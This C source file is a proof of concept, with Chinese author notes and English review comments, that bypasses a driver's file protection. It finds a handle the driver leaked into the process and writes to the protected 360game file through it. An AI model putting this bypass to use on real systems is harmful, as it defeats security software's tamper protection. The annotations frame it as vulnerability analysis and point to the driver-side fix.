//软柿子
//其实这种方法有问题,如果FAT32就挂了
// Equality for FILETIME values: non-zero only when both the high and the
// low DWORD of the two timestamps are identical.
__inline int operator==(FILETIME time1, FILETIME time2)
{
    if (time1.dwHighDateTime != time2.dwHighDateTime) {
        return 0;
    }
    return time1.dwLowDateTime == time2.dwLowDateTime;
}
// Demonstrates the impact of a handle that stays open in this process after
// a direct open of the protected file has been refused: the program confirms
// that CreateFileA is denied, walks the system handle table for entries owned
// by the current process, picks the one whose file metadata matches the
// target path, and writes to the file through it.
//
// Defender's reading: per the author's note below the listing, the root cause
// is a driver that opened the file and never called ZwClose. The driver-side
// fix is to close every handle it opens; creating such handles with
// OBJ_KERNEL_HANDLE additionally keeps them out of a user process's handle
// table.
//
// argc/argv are unused. Always returns 0; exits with -1 if the initial open
// is not rejected with error 5.
int _tmain(int argc, _TCHAR* argv[])
{
// Disabled earlier experiment (hard link to the target), kept by the author.
//DeleteFileA("C:\\test.txt");
//BOOL bSuc = ::CreateHardLinkA(
// "C:\\test.txt","C:\\360game\\360game.Txt",NULL);
//if(bSuc == FALSE){
// puts("CreateHardLink");
// goto failed;
//}
// Attempt a normal open of the target. The returned handle is discarded;
// only the resulting last-error value is inspected.
// NOTE(review): if this open ever succeeds, the handle is leaked and
// GetLastError() may still hold a stale value from an earlier call.
CreateFileA(
"C:\\360game\\360game.Txt",
FILE_GENERIC_WRITE | FILE_GENERIC_READ,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
NULL,
NULL);
// 5 is ERROR_ACCESS_DENIED: continue only when the direct open was refused.
// The message reads: "Wrong operation, do not access this file with any
// other tool".
if(GetLastError() != 5){
printf("错误的操作,请勿用其他任何工具访问此文件");
exit(-1);
}
HANDLE hFile = INVALID_HANDLE_VALUE;
// The SYSTEM_HANDLE_INFORMATION* types, PFNTQUERYSYSTEMINFORMATION and
// DEFAULT_SHI_ARRAY_SIZE are declared elsewhere (not shown in this listing).
PSYSTEM_HANDLE_INFORMATION_EX pShie;
PSYSTEM_HANDLE_INFORMATION pShiTemp;
PFNTQUERYSYSTEMINFORMATION pfNtQuerySystemInformation;
DWORD dwReqSize, dwMaxSize, dwCount = 0;
long nStatus;
// NtQuerySystemInformation is resolved at run time from NTDLL.DLL.
pfNtQuerySystemInformation = (PFNTQUERYSYSTEMINFORMATION)GetProcAddress(GetModuleHandleA("NTDLL.DLL"), "NtQuerySystemInformation");
if (pfNtQuerySystemInformation != NULL)
{
dwMaxSize = DEFAULT_SHI_ARRAY_SIZE;
pShie = (PSYSTEM_HANDLE_INFORMATION_EX)malloc(dwMaxSize);
// Grow the buffer until the query stops reporting a length mismatch.
// NOTE(review): if the first malloc fails the condition short-circuits and
// nStatus is read uninitialized below; a failed realloc also drops the only
// pointer to the previous buffer, which is then never freed.
while ((pShie != NULL) &&
((nStatus = pfNtQuerySystemInformation(SystemHandleInformation, pShie, dwMaxSize, &dwReqSize)) == STATUS_INFO_LENGTH_MISMATCH))
{
dwMaxSize = (dwReqSize >= dwMaxSize)?dwReqSize:(dwMaxSize+DEFAULT_SHI_ARRAY_SIZE);
pShie = (PSYSTEM_HANDLE_INFORMATION_EX)realloc(pShie, dwMaxSize);
}
if (nStatus == 0)
{
dwCount = pShie->NumberOfHandles;
pShiTemp = pShie->Information;
// Runs NumberOfHandles times: the unsigned counter wraps to 0xFFFFFFFF
// once it is decremented past zero.
while (--dwCount != 0xFFFFFFFF)
{
// Only handles owned by this process are examined. The object-type filter
// is commented out, so every such handle is passed to
// GetFileInformationByHandle, whatever kind of object it refers to.
if (GetCurrentProcessId() == pShiTemp->ProcessID)// && (pShiTemp->ObjectTypeNumber == OB_TYPE_FILE))
{
//printf("Handle: %.4X Type: %d Object: %.8X\n", pShiTemp->Handle, pShiTemp->ObjectTypeNumber, pShiTemp->Object);
//ScanSystemHandle(dwSystemProcId, (HANDLE)(pShiTemp->Handle));
BY_HANDLE_FILE_INFORMATION info;
if(GetFileInformationByHandle((HANDLE)pShiTemp->Handle,&info)){
// Identify the handle by comparing its attributes, three timestamps and
// size with the metadata queried by path.
// NOTE(review): the result of GetFileAttributesExA is not checked, so on
// failure `data` is compared uninitialized. The match is heuristic (any
// file with identical metadata also matches), and the author's comment at
// the top of the listing says the approach breaks on FAT32 (reason not
// stated there).
WIN32_FILE_ATTRIBUTE_DATA data;
GetFileAttributesExA("C:\\360game\\360game.Txt",GetFileExInfoStandard,&data);
if(data.dwFileAttributes == info.dwFileAttributes &&
data.ftCreationTime == info.ftCreationTime &&
data.ftLastAccessTime == info.ftLastAccessTime &&
data.ftLastWriteTime == info.ftLastWriteTime &&
data.nFileSizeHigh == info.nFileSizeHigh &&
data.nFileSizeLow == info.nFileSizeLow){
// No break follows: scanning continues and the last matching entry wins.
// NOTE(review): %08X receives a HANDLE, which does not match the
// specifier on 64-bit builds.
hFile = (HANDLE)pShiTemp->Handle;
printf("filehandle found : \r\n handle = 0x%08X",hFile);
}
}
}
// Step to the next entry of the handle array.
pShiTemp = (PSYSTEM_HANDLE_INFORMATION)((LPBYTE)pShiTemp + sizeof(SYSTEM_HANDLE_INFORMATION));
};
}
if (pShie != NULL)
free(pShie);
}
BOOL bSuc = FALSE;
// hFile is still INVALID_HANDLE_VALUE when no handle matched or when
// NtQuerySystemInformation could not be resolved.
if(hFile == INVALID_HANDLE_VALUE){
puts("CreateFile !");
goto failed;
}
// NOTE(review): only the first 8 bytes ("360game" plus the terminator) are
// initialized, yet sizeof(Buffer) == 64 bytes are written, so 56 bytes of
// uninitialized stack contents end up in the file.
BYTE Buffer[64];
DWORD dw;
strcpy((char *)Buffer,"360game");
bSuc = WriteFile(hFile,Buffer,sizeof(Buffer),&dw,NULL);
if(bSuc == FALSE){
puts("WriteFile");
goto failed;
}
goto end;
failed:
// NOTE(review): the code printed here is whatever the most recent API call
// left behind, which is not necessarily the call that failed.
printf("failed with code :%d \r\n",GetLastError());
end:
// Closes the handle located by the scan, if any.
if(hFile != INVALID_HANDLE_VALUE){
CloseHandle(hFile);
}
system("PAUSE");
return 0;
}
软柿子啊. 驱动少写了一句ZwClose. 默哀三分钟.

所以句柄还留在本进程的句柄表里,只是不知道句柄值是多少而已.
所以测试的时候不要让其他进程去打开这个文件.否则如果那个进程以FILE_SHARE_NONE(即共享模式为0,不共享)打开,就挂咯